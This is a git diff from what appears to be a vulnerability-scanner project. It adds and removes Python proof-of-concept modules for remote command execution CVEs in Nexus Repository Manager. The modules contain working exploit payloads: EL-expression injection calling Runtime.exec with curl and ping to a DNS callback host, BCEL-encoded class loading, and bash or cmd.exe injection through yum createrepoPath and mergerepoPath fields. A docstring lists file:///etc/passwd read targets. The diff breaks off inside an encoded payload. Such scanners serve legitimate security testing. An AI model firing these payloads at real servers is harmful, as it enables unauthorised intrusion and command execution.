-            or (dns.result(md, sessid))              # * 可以运行命令, 无回显
-            or (random_num_sum in res.text)          # * 可以执行EL表达式
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Nexus/cve_2020_10204.py b/payloads/Nexus/cve_2020_10204.py
deleted file mode 100644
index 0bbdf5e..0000000
--- a/payloads/Nexus/cve_2020_10204.py
+++ /dev/null
@@ -1,94 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5, random_int_1
-from lib.tool import head
-from lib.tool import check
-from time import sleep
-
-random_str = random_md5(6)
-RCEcommand = 'echo ' + random_str
-
-random_num = random_int_1()
-random_num_sum = str(random_num * random_num)
-
-cve_2020_10204_payloads = [
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}],"type":"rpc","tid":11}''',
-        'headers': {'404': RCEcommand}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('curl DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping -c 4 DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
-        'headers': {}
-    },
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\B{NUM*NUM}"]}],"type":"rpc","tid":11}'''.replace('NUM', str(random_num)),
-        'headers': {}
-    }
-]
-
-def cve_2020_10204_scan(self, clients):
-    ''' 3.21.1及之前版本中, 存在一处任意EL表达式注入漏洞, CVE-2018-16621的绕过 '''
-    client = clients.get('reqClient')
-    sessid = '405b1f856a5cad633f19caf344586cce'
-
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2020-10204',
-    }
-
-    base_headers = {
-        'Content-Type': 'application/json',
-        'X-Requested-With': 'XMLHttpRequest',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2020_10204_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-        headers = payload['headers']
-
-        merge_headers = head.merge(base_headers, headers)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=merge_headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if ((check.check_res(res.text, random_str))     # * 可以运行命令, 有回显
-            or (dns.result(md, sessid))                 # * 可以运行命令, 无回显
-            or (random_num_sum in res.text)             # * 可以执行EL表达式
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Nexus/main.py b/payloads/Nexus/main.py
deleted file mode 100644
index 9644f2b..0000000
--- a/payloads/Nexus/main.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Nexus Repository Manager 3 是一款软件仓库, 可以用来存储和分发Maven、NuGET等软件源仓库
-    Nexus扫描类: 
-        1. Nexus Repository Manager 3 远程命令执行
-            CVE-2019-7238
-                Payload: https://vulhub.org/#/environments/nexus/CVE-2019-7238/
-                         https://exp-blog.com/safe/cve/cve-2019-5475-lou-dong-fen-xi/#toc-heading-9
-            
-        2. Nexus Repository Manager 3 远程命令执行
-            CVE-2020-10199
-                Payload: https://vulhub.org/#/environments/nexus/CVE-2020-10199/
-                         https://github.com/aleenzz/CVE-2020-10199
-
-        3. Nexus Repository Manager 3 远程命令执行
-            CVE-2020-10204
-                Payload: https://vulhub.org/#/environments/nexus/CVE-2020-10204/
-                         https://github.com/aleenzz/CVE-2020-10199
-
-        4. Nexus Repository Manager 2 yum插件 远程命令执行
-            CVE-2019-5475
-                Payload: https://gitee.com/delete_user/CVE-2019-5475#0x60-cve-2019-15588%E9%9D%B6%E5%9C%BA%E9%AA%8C%E8%AF%81
-                         https://cloud.tencent.com/developer/article/1655524
-
-        5. Nexus Repository Manager 2 yum插件 二次远程命令执行
-            CVE-2019-15588
-                Payload: https://gitee.com/delete_user/CVE-2019-5475#0x60-cve-2019-15588%E9%9D%B6%E5%9C%BA%E9%AA%8C%E8%AF%81
-                         https://cloud.tencent.com/developer/article/1655524
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Nexus.tool_get_yumid import get_yumID
-from payloads.Nexus.cve_2019_5475 import cve_2019_5475_scan
-from payloads.Nexus.cve_2019_7238 import cve_2019_7238_scan
-from payloads.Nexus.cve_2019_15588 import cve_2019_15588_scan
-from payloads.Nexus.cve_2020_10199 import cve_2020_10199_scan
-from payloads.Nexus.cve_2020_10204 import cve_2020_10204_scan
-
-class Nexus():
-    def __init__(self):
-        self.app_name = 'Nexus-Repository'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target=self.{}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=self.cve_2019_15588_scan, clients=clients),
-            thread(target=self.cve_2019_5475_scan, clients=clients),
-            thread(target=self.cve_2019_7238_scan, clients=clients),
-            thread(target=self.cve_2020_10199_scan, clients=clients),
-            thread(target=self.cve_2020_10204_scan, clients=clients),
-        ]
-
-Nexus.get_yumID = get_yumID
-Nexus.cve_2019_5475_scan = cve_2019_5475_scan
-Nexus.cve_2019_7238_scan = cve_2019_7238_scan
-Nexus.cve_2019_15588_scan = cve_2019_15588_scan
-Nexus.cve_2020_10199_scan = cve_2020_10199_scan
-Nexus.cve_2020_10204_scan = cve_2020_10204_scan
-
-nexus = Nexus()
diff --git a/payloads/Nexus/nexus-cve-2019-15588-rce.py b/payloads/Nexus/nexus-cve-2019-15588-rce.py
new file mode 100644
index 0000000..874c741
--- /dev/null
+++ b/payloads/Nexus/nexus-cve-2019-15588-rce.py
@@ -0,0 +1,87 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Nexus Repository Manager 2 yum插件 二次远程命令执行
+    CVE-2019-15588
+        Payload: https://gitee.com/delete_user/CVE-2019-5475#0x60-cve-2019-15588%E9%9D%B6%E5%9C%BA%E9%AA%8C%E8%AF%81
+                 https://cloud.tencent.com/developer/article/1655524
+
+CVE-2019-5475的绕过
+'''
+
+from payloads.Nexus.tool_get_yumid import get_yumID
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * createrepoPath
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"/bin/bash -c $@|bash 0 echo RCECOMMAND || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # * mergerepoPath
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"/bin/bash -c $@|bash 0 echo RCECOMMAND || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # ! Windows的Payload暂不支持
+            # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:/Windows/System32/notepad.exe || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:\\\\Windows\\\\System32\\\\notepad.exe || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:/Windows/System32/notepad.exe || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:\\\\Windows\\\\System32\\\\notepad.exe || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Nexus',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-15588',
+        }
+
+        headers = {
+            'Content-Type': 'application/json',
+            'X-Requested-With': 'XMLHttpRequest',
+            'X-Nexus-UI': 'true',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+            'Accept': 'application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json',
+        }
+
+        # todo 尝试获取Yum: Configuration相应的id路径, 如果没有找到yum_id路径, 则退出当前POC
+        path = get_yumID(client, vul_info)
+        if not path:
+            return
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            RCEcommand = 'echo ' + random_str
+            
+            data = payload['data'].replace('RCECOMMAND', RCEcommand)
+
+            res2 = client.request(
+                'put',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+
+            if (check.check_res(res2.text, ' echo '+random_str)
+                # or (check.check_res(res2.text, '/'+random_str))
+            ):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res2
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nexus/nexus-cve-2019-5475-rce.py b/payloads/Nexus/nexus-cve-2019-5475-rce.py
new file mode 100644
index 0000000..0f9836e
--- /dev/null
+++ b/payloads/Nexus/nexus-cve-2019-5475-rce.py
@@ -0,0 +1,89 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Nexus Repository Manager 2 yum插件 远程命令执行
+    CVE-2019-5475
+        Payload: https://gitee.com/delete_user/CVE-2019-5475#0x60-cve-2019-15588%E9%9D%B6%E5%9C%BA%E9%AA%8C%E8%AF%81
+                 https://cloud.tencent.com/developer/article/1655524
+
+Nexus内置插件Yum Repository的RCE命令注入漏洞, 其最早被披露于Hackerone
+'''
+
+from payloads.Nexus.tool_get_yumid import get_yumID
+from lib.tool.md5 import random_md5
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            # * "key":"createrepoPath"
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"bash -c $@|bash 0 echo echo RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"/bin/bash -c $@|bash 0 echo echo RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:/Windows/System32/cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:\\\\Windows\\\\System32\\\\cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            # * "key":"mergerepoPath"
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"bash -c $@|bash 0 echo echo RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"/bin/bash -c $@|bash 0 echo echo RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:/Windows/System32/cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+            {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:\\\\Windows\\\\System32\\\\cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Nexus',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-5475',
+        }
+
+        headers = {
+            'Content-Type': 'application/json',
+            'X-Requested-With': 'XMLHttpRequest',
+            'X-Nexus-UI': 'true',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+            'Accept': 'application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json',
+        }
+
+        # todo 尝试获取Yum: Configuration相应的id路径, 如果没有找到yum_id路径, 则退出当前POC
+        path = get_yumID(client, vul_info)
+        if not path:
+            return
+
+        for payload in self.payloads:
+            random_str = random_md5(6)
+            
+            data = payload['data'].replace('RCEMD', random_str)
+
+            res2 = client.request(
+                'put',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res2 is None:
+                continue
+            
+            if ((check.check_res(res2.text, ' echo '+random_str))
+                or (check.check_res(res2.text, random_str))
+            ):
+                results = {
+                    'Target': res2.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res2
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nexus/nexus-cve-2019-7238-rce.py b/payloads/Nexus/nexus-cve-2019-7238-rce.py
new file mode 100644
index 0000000..e141040
--- /dev/null
+++ b/payloads/Nexus/nexus-cve-2019-7238-rce.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Nexus Repository Manager 3 远程命令执行
+    CVE-2019-7238
+        Payload: https://vulhub.org/#/environments/nexus/CVE-2019-7238/
+                 https://exp-blog.com/safe/cve/cve-2019-5475-lou-dong-fen-xi/#toc-heading-9
+
+3.14.0及之前版本中, 存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能, 
+    这处功能存在未授权访问，可以导致任意命令执行
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from lib.tool import head
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.random_str = random_md5(6)
+        RCEcommand = 'echo ' + self.random_str
+        
+        self.payloads = [
+            # * 回显POC
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$e